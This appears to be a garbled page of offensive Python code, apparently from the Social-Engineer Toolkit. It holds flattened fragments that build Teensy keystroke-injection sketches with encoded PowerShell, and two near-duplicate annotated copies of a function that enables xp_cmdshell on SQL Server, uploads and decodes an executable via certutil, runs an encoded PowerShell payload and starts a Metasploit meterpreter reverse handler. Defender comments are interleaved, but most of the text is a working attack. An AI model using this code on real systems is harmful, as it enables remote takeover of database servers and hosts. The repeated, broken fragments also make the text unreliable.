Keyboard.set_key1(0); Keyboard.send_now(); delay(1500); Keyboard.print(SomeCommand); Keyboard.set_key1(KEY_ENTER); Keyboard.send_now(); Keyboard.set_key1(0); Keyboard.send_now(); }} void PRES(int KeyCode){{ Keyboard.set_key1(KeyCode); Keyboard.send_now(); Keyboard.set_key1(0); Keyboard.send_now(); }} """.format(random_filename=random_filename, encodedcommand=core.powershell_encodedcommand(powershell_command), vbs=vbs, bat=bat)) # delete temporary file subprocess.Popen("rm {0} 1> /dev/null 2>/dev/null".format(random_filename), shell=True).wait() print("[*] Binary to Teensy file exported as teensy.ino") # write the teensy.ino file out with open("teensy.ino", "w") as filewrite: # write the teensy.ino file out filewrite.write(output_variable) print(""" Instructions: Copy the converts.txt file to the sdcard on the Teensy device. Use the teensy.ino normally and use the Arduino IDE to place the latest code in there. Notice that you need to change some code marked above based on the Teensy and the Teensy++ based on how you soldered the PIN's on.
try: core.module_reload(src.payloads.powershell.prep) except: import src.payloads.powershell.prep #prep_powershell_payload() # create the directory if it does not exist if not os.path.isdir(core.setdir + "/reports/powershell"): os.makedirs(core.setdir + "/reports/powershell") # here we format everything for us with open(core.setdir + "/x86.powershell") as fileopen: x86 = fileopen.read() x86 = core.powershell_encodedcommand() + x86 core.print_status("If you want the powershell commands and attack, they are exported to {0}".format(os.path.join(core.setdir, "reports/powershell/"))) with open(core.setdir + "/reports/powershell/x86_powershell_injection.txt", "w") as filewrite: filewrite.write(x86) choice = core.yesno_prompt("0", "Do you want to start the listener now [yes/no]: ") if choice == 'NO': pass # if we want to start the listener if choice == 'YES': with open(core.setdir + "/reports/powershell/powershell.rc", "w") as filewrite: filewrite.write("use multi/handler\n" "set payload windows/meterpreter/reverse_https\n" "set LPORT {0}\n" "set LHOST 0.0.0.0\n"
} void PRES(int KeyCode){ Keyboard.set_key1(KeyCode); Keyboard.send_now(); Keyboard.set_key1(0); Keyboard.send_now(); } void SPRE(int KeyCode){ Keyboard.set_modifier(MODIFIERKEY_SHIFT); Keyboard.set_key1(KeyCode); Keyboard.send_now(); Keyboard.set_modifier(0); Keyboard.set_key1(0); Keyboard.send_now(); } """ % (core.powershell_encodedcommand()) print("[*] Payload has been extracted. Copying file to {0}".format(os.path.join(core.setdir + "reports/teensy.ino"))) if not os.path.isdir(os.path.join(core.setdir + "reports")): os.makedirs(os.path.join(core.setdir + "reports")) with open(os.path.join(core.setdir + "reports/teensy.ino"), "w") as filewrite: filewrite.write(teensy) choice = core.yesno_prompt("0", "Do you want to start a listener [yes/no] ") if choice == "YES": # Open the IPADDR file if core.check_options("IPADDR=") != 0: ipaddr = core.check_options("IPADDR=") else: ipaddr = input("LHOST IP address to connect back on: ") core.update_options("IPADDR=" + ipaddr)
def deploy_hex2binary(ipaddr, port, username, password):
    """Deliver and run a payload on a SQL Server host through xp_cmdshell.

    NOTE(review): this page lost the function's line breaks and indentation.
    The nesting below is reconstructed from statement order and should be
    checked against the upstream file before it is relied on.

    The function connects with ``_mssql.connect``, tries to turn on
    ``xp_cmdshell`` and then asks the operator which delivery path to use:

    * option "1": an encoded PowerShell command built from the
      ``x86.powershell`` file is run through ``xp_cmdshell`` while a
      Metasploit handler is started locally through pexpect.
    * option "2": a local executable is hex-encoded into ``payload.hex``,
      echoed to the server 900 characters at a time, passed through
      ``certutil -decode`` and executed.

    Args:
        ipaddr: SQL Server address used for the connection. Reassigned from
            ``core.grab_ipaddress()`` inside the option "1" branch.
        port: SQL Server port used for the connection. Reassigned from an
            operator prompt (the listener port) inside the option "1" branch.
        username: login passed to ``_mssql.connect``.
        password: password passed to ``_mssql.connect``.

    Returns:
        None. Everything the function does is a side effect: SQL statements
        on the server, files under ``core.userconfigpath``, child processes.

    Defender notes:
        Every remote step is an ``xp_cmdshell`` call, so on the server it
        shows up as command-interpreter child processes of the SQL Server
        service (echo redirection into a ``.crt`` file, ``certutil -decode``,
        ``powershell -enc``). Leaving ``xp_cmdshell`` disabled and keeping
        ALTER SETTINGS away from application logins removes the primitive
        this function depends on.

    The body reads ``core``, ``_mssql``, ``operating_system`` and
    ``definepath`` from outside the function (presumably module scope;
    not visible on this page).
    """
    # base variable used to select payload option
    option = None
    choice1 = "1"

    conn = _mssql.connect("{0}:{1}".format(ipaddr, port), username, password)
    core.print_status("Enabling the xp_cmdshell stored procedure...")
    # Two sp_configure changes: expose advanced options, then enable
    # xp_cmdshell. A change of this option on a production instance is worth
    # an alert on its own.
    try:
        conn.execute_query("exec master.dbo.sp_configure 'show advanced options',1;"
                           "GO;"
                           "RECONFIGURE;"
                           "GO;"
                           "exec master.dbo.sp_configure 'xp_cmdshell', 1;"
                           "GO;"
                           "RECONFIGURE;"
                           "GO")
    except:
        # any failure (for example missing rights) is ignored and the
        # function carries on regardless
        pass

    # ask the operator which delivery method to use
    try:
        print("""Pick which deployment method to use. The first is PowerShell and should be used on any modern operating system. The second method will use the certutil method to convert a binary to a binary.\n""")

        choice = input("Enter your choice:\n\n"
                       "1.) Use PowerShell Injection (recommended)\n"
                       "2.) Use Certutil binary conversion\n\n"
                       "Enter your choice [1]:")
        if choice == "":
            choice = "1"
        if choice == "1":
            core.print_status("Powershell injection was selected to deploy to the remote system (awesome).")
            option_ps = input("Do you want to use powershell injection? [yes/no]:")
            # only "", "y" and "yes" confirm; any other answer selects option 2
            if option_ps.lower() == "" or option_ps == "y" or option_ps == "yes":
                option = "1"
                core.print_status("Powershell delivery selected. Boom!")
            else:
                option = "2"

        # otherwise, fall back to the older version using debug conversion via hex
        else:
            core.print_status("Powershell not selected, using debug method.")
            option = "2"

    except Exception as err:
        # on error `option` may still be None, in which case neither delivery
        # branch below runs
        print(err)

    payload_filename = None

    # if we don't have powershell
    if option == "2":
        # give option to use msf or your own
        core.print_status("You can either select to use a default "
                          "Metasploit payload here or import your "
                          "own in order to deliver to the system. "
                          "Note that if you select your own, you "
                          "will need to create your own listener "
                          "at the end in order to capture this.\n\n")
        choice1 = input("1.) Use Metasploit (default)\n"
                        "2.) Select your own\n\n"
                        "Enter your choice[1]:")

        if choice1 == "":
            choice1 = "1"

        if choice1 == "2":
            # up to three attempts to name an existing local file
            attempts = 0
            while attempts <= 2:
                payload_filename = input("Enter the path to your file you want to deploy to the system (ex /root/blah.exe):")
                if os.path.isfile(payload_filename):
                    break
                else:
                    core.print_error("File not found! Try again.")
                    attempts += 1
            else:
                # while/else: reached only when the loop ended without a break
                core.print_error("Computers are hard. Find the path and try again. Defaulting to Metasploit payload.")
                choice1 = "1"

        if choice1 == "1":
            web_path = None
            #prep_powershell_payload()
            # imported for its side effects; presumably this generates the
            # payload files used below -- confirm against that module
            import src.core.payloadgen.create_payloads

            # if we are using a SET interactive shell payload then we need to make
            # the path under web_clone versus ~./set
            if os.path.isfile(os.path.join(core.userconfigpath, "set.payload")):
                web_path = os.path.join(core.userconfigpath, "web_clone")
            # then we are using metasploit
            else:
                if operating_system == "posix":
                    web_path = core.userconfigpath
                    # if it isn't there yet
                    if not os.path.isfile(core.userconfigpath + "1msf.exe"):
                        # move it then
                        # NOTE(review): the config path is interpolated into a
                        # shell string (shell=True); a path containing shell
                        # metacharacters would be interpreted by the shell
                        subprocess.Popen("cp %s/msf.exe %s/1msf.exe" %
                                         (core.userconfigpath, core.userconfigpath), shell=True).wait()
                        subprocess.Popen("cp %s/1msf.exe %s/ 1> /dev/null 2> /dev/null" %
                                         (core.userconfigpath, core.userconfigpath), shell=True).wait()
                        subprocess.Popen("cp %s/msf2.exe %s/msf.exe 1> /dev/null 2> /dev/null" %
                                         (core.userconfigpath, core.userconfigpath), shell=True).wait()
            # plain string concatenation inside a single-argument join
            payload_filename = os.path.join(web_path + "1msf.exe")

        with open(payload_filename, "rb") as fileopen:
            # read in the binary
            data = fileopen.read()
            # convert the binary to hex
            data = binascii.hexlify(data)
            # write the hex text out to payload.hex for the chunked transfer below
            with open(os.path.join(core.userconfigpath, "payload.hex"), "w") as filewrite:
                filewrite.write(data)

        if choice1 == "1":
            # if we are using metasploit, start the listener
            if not os.path.isfile(os.path.join(core.userconfigpath, "set.payload")):
                if operating_system == "posix":
                    try:
                        core.module_reload(pexpect)
                    except:
                        import pexpect
                    # NOTE(review): it cannot be told from the flattened page
                    # whether the next three statements sit inside the except
                    # body -- confirm
                    core.print_status("Starting the Metasploit listener...")
                    msf_path = core.meta_path()
                    child2 = pexpect.spawn("{0} -r {1}\r\n\r\n".format(os.path.join(core.meta_path() + "msfconsole"),
                                                                        os.path.join(core.userconfigpath, "meta_config")))

    # random executable name; used as the base name of the .crt and .exe
    # files created on the server in the option 2 path
    random_exe = core.generate_random_string(10, 15)

    #
    # next we deploy our hex to binary if we selected option 1 (powershell)
    #

    if option == "1":
        core.print_status("Using universal powershell x86 process downgrade attack..")
        payload = "x86"

        # specify ipaddress of reverse listener
        # from here on the ipaddr/port parameters hold listener values, not
        # the SQL Server endpoint
        ipaddr = core.grab_ipaddress()
        core.update_options("IPADDR=" + ipaddr)
        port = input(core.setprompt(["29"], "Enter the port for the reverse [443]"))

        if not port:
            port = "443"

        core.update_options("PORT={0}".format(port))
        core.update_options("POWERSHELL_SOLO=ON")
        core.print_status("Prepping the payload for delivery and injecting alphanumeric shellcode...")

        #with open(os.path.join(core.userconfigpath, "payload_options.shellcode"), "w") as filewrite:
        # format needed for shellcode generation
        filewrite = file(core.userconfigpath + "payload_options.shellcode", "w")
        filewrite.write("windows/meterpreter/reverse_https {0},".format(port))
        filewrite.close()

        # (re)import the prep module for its side effects; presumably it
        # writes the x86.powershell file read below -- confirm
        try:
            core.module_reload(src.payloads.powershell.prep)
        except:
            import src.payloads.powershell.prep

        # launch powershell

        # create the directory if it does not exist
        if not os.path.isdir(os.path.join(core.userconfigpath, "reports/powershell")):
            os.makedirs(os.path.join(core.userconfigpath, "reports/powershell"))

        x86 = file(core.userconfigpath + "x86.powershell").read().rstrip()
        x86 = core.powershell_encodedcommand(x86)
        core.print_status("If you want the powershell commands and attack, "
                          "they are exported to {0}".format(os.path.join(core.userconfigpath, "reports/powershell")))
        # a copy of the generated command is kept in the reports directory
        filewrite = open(core.userconfigpath + "reports/powershell/x86_powershell_injection.txt", "w")
        filewrite.write(x86)
        filewrite.close()

        # if our payload is x86 based - need to prep msfconsole rc
        # (`payload` is set to "x86" a few lines up, so the else arm is not
        # reachable as written)
        if payload == "x86":
            powershell_command = x86
            filewrite = open(core.userconfigpath + "reports/powershell/powershell.rc", "w")
            # the handler listens on every local interface (LHOST 0.0.0.0)
            filewrite.write("use multi/handler\n"
                            "set payload windows/meterpreter/reverse_https\n"
                            "set lport {0}\n"
                            "set LHOST 0.0.0.0\n"
                            "exploit -j".format(port))
            filewrite.close()

        else:
            powershell_command = None

        # grab the metasploit path from config or smart detection
        msf_path = core.meta_path()
        if operating_system == "posix":
            try:
                core.module_reload(pexpect)
            except:
                import pexpect
            # NOTE(review): nesting after the except is reconstructed -- confirm
            core.print_status("Starting the Metasploit listener...")
            child2 = pexpect.spawn("{0} -r {1}".format(os.path.join(msf_path + "msfconsole"),
                                                       os.path.join(core.userconfigpath, "reports/powershell/powershell.rc")))
            core.print_status("Waiting for the listener to start first before we continue forward...")
            core.print_status("Be patient, Metasploit takes a little bit to start...")
            #child2.expect("Starting the payload handler", timeout=30000)
            # block until the console prints "Processing" (it is loading the rc file)
            child2.expect("Processing", timeout=30000)
            core.print_status("Metasploit started... Waiting a couple more seconds for listener to activate..")
            time.sleep(5)

        # assign random_exe command to the powershell command
        random_exe = powershell_command

    #
    # next we deploy our hex to binary if we selected option 2 (debug)
    #

    if option == "2":
        # here we start the conversion and execute the payload
        core.print_status("Sending the main payload via to be converted back to a binary.")
        # read in the file 900 bytes at a time
        #with open(os.path.join(core.userconfigpath, 'payload.hex'), 'r') as fileopen:
        # this handle is not closed anywhere in the function
        fileopen = open(core.userconfigpath + 'payload.hex', "r")
        core.print_status("Dropping initial begin certificate header...")
        # Defender note: a long run of `echo ... >> <name>.crt` commands issued
        # by the SQL Server service, followed by certutil -decode into an .exe,
        # is a distinctive sequence in process-creation logs.
        conn.execute_query("exec master ..xp_cmdshell 'echo -----BEGIN CERTIFICATE----- > {0}.crt'".format(random_exe))
        while fileopen:
            data = fileopen.read(900).rstrip()
            #for data in fileopen.read(900).rstrip():
            # an empty read means end of file
            if data == "":
                break
            core.print_status("Deploying payload to victim machine (hex): {bold}{data}{endc}\n".format(bold=core.bcolors.BOLD,
                                                                                                         data=data,
                                                                                                         endc=core.bcolors.ENDC))
            # one xp_cmdshell call per chunk; the statement is built by string
            # formatting, not parameter binding
            conn.execute_query("exec master..xp_cmdshell 'echo {data} >> {exe}.crt'".format(data=data, exe=random_exe))
        core.print_status("Delivery complete. Converting hex back to binary format.")

        core.print_status("Dropping end header for binary format conversion...")
        conn.execute_query("exec master ..xp_cmdshell 'echo -----END CERTIFICATE----- >> {0}.crt'".format(random_exe))
        core.print_status("Converting hex binary back to hex using certutil - Matthew Graeber man crush enabled.")
        conn.execute_query("exec master..xp_cmdshell 'certutil -decode {0}.crt {0}.exe'".format(random_exe))
        core.print_status("Executing the payload - magic has happened and now its time for that moment.. "
                          "You know. When you celebrate. Salute to you ninja - you deserve it.")
        conn.execute_query("exec master..xp_cmdshell '{0}.exe'".format(random_exe))

    # if we are using SET payload
    if choice1 == "1":
        if os.path.isfile(os.path.join(core.userconfigpath, "set.payload")):
            core.print_status("Spawning separate child process for listener...")
            try:
                shutil.copyfile(os.path.join(core.userconfigpath, "web_clone/x"), definepath)
            except:
                # copy failures are ignored
                pass

            # start a threaded webserver in the background
            subprocess.Popen("python src/html/fasttrack_http_server.py", shell=True)
            # grab the port options
            # if core.check_options("PORT=") != 0:
            #     port = core.heck_options("PORT=")
            #
            # # if for some reason the port didnt get created we default to 443
            # else:
            #     port = "443"

    # thread is needed here due to the connect not always terminating thread,
    # it hangs if thread isnt specified
    try:
        core.module_reload(thread)
    except:
        import thread

    # execute the payload
    # we append more commands if option 1 is used
    if option == "1":
        core.print_status("Triggering the powershell injection payload... ")
        # remove encoding
        if "toString" in powershell_command:
            # keep only the text after the marker, drop single quotes, then
            # put the `powershell -enc` prefix back
            powershell_command = powershell_command.split(".value.toString() '")[1].replace("'", "")
            powershell_command = 'powershell -enc "' + powershell_command
        # Defender note: the server-side artefact is a PowerShell process with
        # an encoded command argument, started by the SQL Server service.
        sql_command = ("exec master..xp_cmdshell '{0}'".format(powershell_command))
        # run in a separate thread so a query that never returns does not
        # block this function
        thread.start_new_thread(conn.execute_query, (sql_command,))

    # using the old method
    if option == "2":
        core.print_status("Triggering payload stager...")
        alphainject = ""
        # optional argument text read from meterpreter.alpha when that file exists
        if os.path.isfile(os.path.join(core.userconfigpath, "meterpreter.alpha")):
            with open(os.path.join(core.userconfigpath, "meterpreter.alpha")) as fileopen:
                alphainject = fileopen.read()

        sql_command = ("xp_cmdshell '{0}.exe {1}'".format(random_exe, alphainject))
        # start thread of SQL command that executes payload
        thread.start_new_thread(conn.execute_query, (sql_command,))
        time.sleep(1)

    # if pexpect doesnt exit right then it freaks out
    if choice1 == "1":
        if os.path.isfile(os.path.join(core.userconfigpath, "set.payload")):
            os.system("python ../../payloads/set_payloads/listener.py")
        try:
            # interact with the child process through pexpect
            # child2 is assigned only in the branches above that spawn
            # msfconsole; if none ran, the error raised here is swallowed by
            # the bare except below
            child2.interact()
            try:
                os.remove("x")
            except:
                pass
        except:
            pass
def deploy_hex2binary(ipaddr, port, username, password):
    """Deliver and run a payload on a SQL Server host through xp_cmdshell.

    NOTE(review): this page lost the function's line breaks and indentation.
    The nesting below is reconstructed from statement order and should be
    checked against the upstream file before it is relied on.

    The function connects with ``_mssql.connect``, tries to turn on
    ``xp_cmdshell`` and then asks the operator which delivery path to use:

    * option "1": an encoded PowerShell command built from the
      ``x86.powershell`` file is run through ``xp_cmdshell`` while a
      Metasploit handler is started locally through pexpect.
    * option "2": a local executable is hex-encoded into ``payload.hex``,
      echoed to the server 900 characters at a time, passed through
      ``certutil -decode`` and executed.

    Args:
        ipaddr: SQL Server address used for the connection. Reassigned from
            ``core.grab_ipaddress()`` inside the option "1" branch.
        port: SQL Server port used for the connection. Reassigned from an
            operator prompt (the listener port) inside the option "1" branch.
        username: login passed to ``_mssql.connect``.
        password: password passed to ``_mssql.connect``.

    Returns:
        None. Everything the function does is a side effect: SQL statements
        on the server, files under ``core.setdir``, child processes.

    Defender notes:
        Every remote step is an ``xp_cmdshell`` call, so on the server it
        shows up as command-interpreter child processes of the SQL Server
        service (echo redirection into a ``.crt`` file, ``certutil -decode``,
        ``powershell -enc``). Leaving ``xp_cmdshell`` disabled and keeping
        ALTER SETTINGS away from application logins removes the primitive
        this function depends on.

    Paths are built by string concatenation with ``core.setdir``; most
    ``os.path.join`` calls here take a single argument and therefore add no
    separator, while a few literals start with "/". Whether ``core.setdir``
    ends with a separator is not visible on this page.

    The body reads ``core``, ``_mssql``, ``operating_system`` and
    ``definepath`` from outside the function (presumably module scope;
    not visible on this page).
    """
    # base variable used to select payload option
    option = None
    choice1 = "1"

    conn = _mssql.connect("{0}:{1}".format(ipaddr, port), username, password)
    core.print_status("Enabling the xp_cmdshell stored procedure...")
    # Two sp_configure changes: expose advanced options, then enable
    # xp_cmdshell. A change of this option on a production instance is worth
    # an alert on its own.
    try:
        conn.execute_query(
            "exec master.dbo.sp_configure 'show advanced options',1;"
            "GO;"
            "RECONFIGURE;"
            "GO;"
            "exec master.dbo.sp_configure 'xp_cmdshell', 1;"
            "GO;"
            "RECONFIGURE;"
            "GO")
    except:
        # any failure (for example missing rights) is ignored and the
        # function carries on regardless
        pass

    # ask the operator which delivery method to use
    try:
        print(
            """Pick which deployment method to use. The first is PowerShell and should be used on any modern operating system. The second method will use the certutil method to convert a binary to a binary.\n"""
        )

        choice = input("Enter your choice:\n\n"
                       "1.) Use PowerShell Injection (recommended)\n"
                       "2.) Use Certutil binary conversion\n\n"
                       "Enter your choice [1]:")
        if choice == "":
            choice = "1"
        if choice == "1":
            core.print_status(
                "Powershell injection was selected to deploy to the remote system (awesome)."
            )
            option_ps = input(
                "Do you want to use powershell injection? [yes/no]:")
            # only "", "y" and "yes" confirm; any other answer selects option 2
            if option_ps.lower() == "" or option_ps == "y" or option_ps == "yes":
                option = "1"
                core.print_status("Powershell delivery selected. Boom!")
            else:
                option = "2"

        # otherwise, fall back to the older version using debug conversion via hex
        else:
            core.print_status("Powershell not selected, using debug method.")
            option = "2"

    except Exception as err:
        # on error `option` may still be None, in which case neither delivery
        # branch below runs
        print(err)

    payload_filename = None

    # if we don't have powershell
    if option == "2":
        # give option to use msf or your own
        core.print_status("You can either select to use a default "
                          "Metasploit payload here or import your "
                          "own in order to deliver to the system. "
                          "Note that if you select your own, you "
                          "will need to create your own listener "
                          "at the end in order to capture this.\n\n")
        choice1 = input("1.) Use Metasploit (default)\n"
                        "2.) Select your own\n\n"
                        "Enter your choice[1]:")

        if choice1 == "":
            choice1 = "1"

        if choice1 == "2":
            # up to three attempts to name an existing local file
            attempts = 0
            while attempts <= 2:
                payload_filename = input(
                    "Enter the path to your file you want to deploy to the system (ex /root/blah.exe):"
                )
                if os.path.isfile(payload_filename):
                    break
                else:
                    core.print_error("File not found! Try again.")
                    attempts += 1
            else:
                # while/else: reached only when the loop ended without a break
                core.print_error(
                    "Computers are hard. Find the path and try again. Defaulting to Metasploit payload."
                )
                choice1 = "1"

        if choice1 == "1":
            web_path = None
            #prep_powershell_payload()
            # imported for its side effects; presumably this generates the
            # payload files used below -- confirm against that module
            import src.core.payloadgen.create_payloads

            # if we are using a SET interactive shell payload then we need to make
            # the path under web_clone versus ~./set
            if os.path.isfile(os.path.join(core.setdir + "set.payload")):
                web_path = os.path.join(core.setdir + "web_clone")
            # then we are using metasploit
            else:
                if operating_system == "posix":
                    web_path = core.setdir
                    # if it isn't there yet
                    if not os.path.isfile(core.setdir + "1msf.exe"):
                        # move it then
                        # NOTE(review): the config path is interpolated into a
                        # shell string (shell=True); a path containing shell
                        # metacharacters would be interpreted by the shell
                        subprocess.Popen("cp %s/msf.exe %s/1msf.exe" %
                                         (core.setdir, core.setdir),
                                         shell=True).wait()
                        subprocess.Popen(
                            "cp %s/1msf.exe %s/ 1> /dev/null 2> /dev/null" %
                            (core.setdir, core.setdir),
                            shell=True).wait()
                        subprocess.Popen(
                            "cp %s/msf2.exe %s/msf.exe 1> /dev/null 2> /dev/null"
                            % (core.setdir, core.setdir),
                            shell=True).wait()
            # plain string concatenation inside a single-argument join
            payload_filename = os.path.join(web_path + "1msf.exe")

        with open(payload_filename, "rb") as fileopen:
            # read in the binary
            data = fileopen.read()
            # convert the binary to hex
            data = binascii.hexlify(data)
            # write the hex text out to payload.hex for the chunked transfer below
            with open(os.path.join(core.setdir + "payload.hex"),
                      "w") as filewrite:
                filewrite.write(data)

        if choice1 == "1":
            # if we are using metasploit, start the listener
            if not os.path.isfile(os.path.join(core.setdir + "set.payload")):
                if operating_system == "posix":
                    try:
                        core.module_reload(pexpect)
                    except:
                        import pexpect
                    # NOTE(review): it cannot be told from the flattened page
                    # whether the next three statements sit inside the except
                    # body -- confirm
                    core.print_status(
                        "Starting the Metasploit listener...")
                    msf_path = core.meta_path()
                    child2 = pexpect.spawn("{0} -r {1}\r\n\r\n".format(
                        os.path.join(core.meta_path() + "msfconsole"),
                        os.path.join(core.setdir + "meta_config")))

    # random executable name; used as the base name of the .crt and .exe
    # files created on the server in the option 2 path
    random_exe = core.generate_random_string(10, 15)

    #
    # next we deploy our hex to binary if we selected option 1 (powershell)
    #

    if option == "1":
        core.print_status(
            "Using universal powershell x86 process downgrade attack..")
        payload = "x86"

        # specify ipaddress of reverse listener
        # from here on the ipaddr/port parameters hold listener values, not
        # the SQL Server endpoint
        ipaddr = core.grab_ipaddress()
        core.update_options("IPADDR=" + ipaddr)
        port = input(
            core.setprompt(["29"], "Enter the port for the reverse [443]"))

        if not port:
            port = "443"

        core.update_options("PORT={0}".format(port))
        core.update_options("POWERSHELL_SOLO=ON")
        core.print_status(
            "Prepping the payload for delivery and injecting alphanumeric shellcode..."
        )

        #with open(os.path.join(core.setdir + "/payload_options.shellcode"), "w") as filewrite:
        # format needed for shellcode generation
        filewrite = file(core.setdir + "/payload_options.shellcode", "w")
        filewrite.write("windows/meterpreter/reverse_https {0},".format(port))
        filewrite.close()

        # (re)import the prep module for its side effects; presumably it
        # writes the x86.powershell file read below -- confirm
        try:
            core.module_reload(src.payloads.powershell.prep)
        except:
            import src.payloads.powershell.prep

        # launch powershell

        # create the directory if it does not exist
        if not os.path.isdir(os.path.join(core.setdir + "reports/powershell")):
            os.makedirs(os.path.join(core.setdir + "reports/powershell"))

        x86 = file(core.setdir + "x86.powershell").read().rstrip()
        x86 = core.powershell_encodedcommand(x86)
        core.print_status("If you want the powershell commands and attack, "
                          "they are exported to {0}".format(
                              os.path.join(core.setdir + "reports/powershell")))
        # a copy of the generated command is kept in the reports directory
        filewrite = open(
            core.setdir + "/reports/powershell/x86_powershell_injection.txt",
            "w")
        filewrite.write(x86)
        filewrite.close()

        # if our payload is x86 based - need to prep msfconsole rc
        # (`payload` is set to "x86" a few lines up, so the else arm is not
        # reachable as written)
        if payload == "x86":
            powershell_command = x86
            filewrite = open(core.setdir + "reports/powershell/powershell.rc",
                             "w")
            # the handler listens on every local interface (LHOST 0.0.0.0)
            filewrite.write("use multi/handler\n"
                            "set payload windows/meterpreter/reverse_https\n"
                            "set lport {0}\n"
                            "set LHOST 0.0.0.0\n"
                            "exploit -j".format(port))
            filewrite.close()

        else:
            powershell_command = None

        # grab the metasploit path from config or smart detection
        msf_path = core.meta_path()
        if operating_system == "posix":
            try:
                core.module_reload(pexpect)
            except:
                import pexpect
            # NOTE(review): nesting after the except is reconstructed -- confirm
            core.print_status("Starting the Metasploit listener...")
            child2 = pexpect.spawn("{0} -r {1}".format(
                os.path.join(msf_path + "msfconsole"),
                os.path.join(core.setdir + "reports/powershell/powershell.rc")))
            core.print_status(
                "Waiting for the listener to start first before we continue forward..."
            )
            core.print_status(
                "Be patient, Metasploit takes a little bit to start...")
            #child2.expect("Starting the payload handler", timeout=30000)
            # block until the console prints "Processing" (it is loading the rc file)
            child2.expect("Processing", timeout=30000)
            core.print_status(
                "Metasploit started... Waiting a couple more seconds for listener to activate.."
            )
            time.sleep(5)

        # assign random_exe command to the powershell command
        random_exe = powershell_command

    #
    # next we deploy our hex to binary if we selected option 2 (debug)
    #

    if option == "2":
        # here we start the conversion and execute the payload
        core.print_status(
            "Sending the main payload via to be converted back to a binary.")
        # read in the file 900 bytes at a time
        #with open(os.path.join(core.setdir + 'payload.hex'), 'r') as fileopen:
        # this handle is not closed anywhere in the function
        fileopen = open(core.setdir + 'payload.hex', "r")
        core.print_status("Dropping initial begin certificate header...")
        # Defender note: a long run of `echo ... >> <name>.crt` commands issued
        # by the SQL Server service, followed by certutil -decode into an .exe,
        # is a distinctive sequence in process-creation logs.
        conn.execute_query(
            "exec master ..xp_cmdshell 'echo -----BEGIN CERTIFICATE----- > {0}.crt'"
            .format(random_exe))
        while fileopen:
            data = fileopen.read(900).rstrip()
            #for data in fileopen.read(900).rstrip():
            # an empty read means end of file
            if data == "":
                break
            core.print_status(
                "Deploying payload to victim machine (hex): {bold}{data}{endc}\n"
                .format(bold=core.bcolors.BOLD,
                        data=data,
                        endc=core.bcolors.ENDC))
            # one xp_cmdshell call per chunk; the statement is built by string
            # formatting, not parameter binding
            conn.execute_query(
                "exec master..xp_cmdshell 'echo {data} >> {exe}.crt'".format(
                    data=data, exe=random_exe))
        core.print_status(
            "Delivery complete. Converting hex back to binary format.")

        core.print_status(
            "Dropping end header for binary format conversion...")
        conn.execute_query(
            "exec master ..xp_cmdshell 'echo -----END CERTIFICATE----- >> {0}.crt'"
            .format(random_exe))
        core.print_status(
            "Converting hex binary back to hex using certutil - Matthew Graeber man crush enabled."
        )
        conn.execute_query(
            "exec master..xp_cmdshell 'certutil -decode {0}.crt {0}.exe'".
            format(random_exe))
        core.print_status(
            "Executing the payload - magic has happened and now its time for that moment.. "
            "You know. When you celebrate. Salute to you ninja - you deserve it."
        )
        conn.execute_query(
            "exec master..xp_cmdshell '{0}.exe'".format(random_exe))

    # if we are using SET payload
    if choice1 == "1":
        if os.path.isfile(os.path.join(core.setdir + "set.payload")):
            core.print_status(
                "Spawning separate child process for listener...")
            try:
                shutil.copyfile(os.path.join(core.setdir + "web_clone/x"),
                                definepath)
            except:
                # copy failures are ignored
                pass

            # start a threaded webserver in the background
            subprocess.Popen("python src/html/fasttrack_http_server.py",
                             shell=True)
            # grab the port options
            # if core.check_options("PORT=") != 0:
            #     port = core.heck_options("PORT=")
            #
            # # if for some reason the port didnt get created we default to 443
            # else:
            #     port = "443"

    # thread is needed here due to the connect not always terminating thread,
    # it hangs if thread isnt specified
    try:
        core.module_reload(thread)
    except:
        import thread

    # execute the payload
    # we append more commands if option 1 is used
    if option == "1":
        core.print_status("Triggering the powershell injection payload... ")
        # remove encoding
        if "toString" in powershell_command:
            # keep only the text after the marker, drop single quotes, then
            # put the `powershell -enc` prefix back
            powershell_command = powershell_command.split(
                ".value.toString() '")[1].replace("'", "")
            powershell_command = 'powershell -enc "' + powershell_command
        # Defender note: the server-side artefact is a PowerShell process with
        # an encoded command argument, started by the SQL Server service.
        sql_command = (
            "exec master..xp_cmdshell '{0}'".format(powershell_command))
        # run in a separate thread so a query that never returns does not
        # block this function
        thread.start_new_thread(conn.execute_query, (sql_command, ))

    # using the old method
    if option == "2":
        core.print_status("Triggering payload stager...")
        alphainject = ""
        # optional argument text read from meterpreter.alpha when that file exists
        if os.path.isfile(os.path.join(core.setdir + "meterpreter.alpha")):
            with open(os.path.join(core.setdir +
                                   "meterpreter.alpha")) as fileopen:
                alphainject = fileopen.read()

        sql_command = ("xp_cmdshell '{0}.exe {1}'".format(
            random_exe, alphainject))
        # start thread of SQL command that executes payload
        thread.start_new_thread(conn.execute_query, (sql_command, ))
        time.sleep(1)

    # if pexpect doesnt exit right then it freaks out
    if choice1 == "1":
        if os.path.isfile(os.path.join(core.setdir + "set.payload")):
            os.system("python ../../payloads/set_payloads/listener.py")
        try:
            # interact with the child process through pexpect
            # child2 is assigned only in the branches above that spawn
            # msfconsole; if none ran, the error raised here is swallowed by
            # the bare except below
            child2.interact()
            try:
                os.remove("x")
            except:
                pass
        except:
            pass
Keyboard.send_now(); delay(1500); Keyboard.print(SomeCommand); Keyboard.set_key1(KEY_ENTER); Keyboard.send_now(); Keyboard.set_key1(0); Keyboard.send_now(); }} void PRES(int KeyCode){{ Keyboard.set_key1(KeyCode); Keyboard.send_now(); Keyboard.set_key1(0); Keyboard.send_now(); }} """.format(random_filename=random_filename, encodedcommand=core.powershell_encodedcommand(powershell_command), vbs=vbs, bat=bat)) # delete temporary file subprocess.Popen("rm {0} 1> /dev/null 2>/dev/null".format(random_filename), shell=True).wait() print("[*] Binary to Teensy file exported as teensy.ino") # write the teensy.ino file out with open("teensy.ino", "w") as filewrite: # write the teensy.ino file out filewrite.write(output_variable) print(""" Instructions: Copy the converts.txt file to the sdcard on the Teensy device. Use the teensy.ino normally
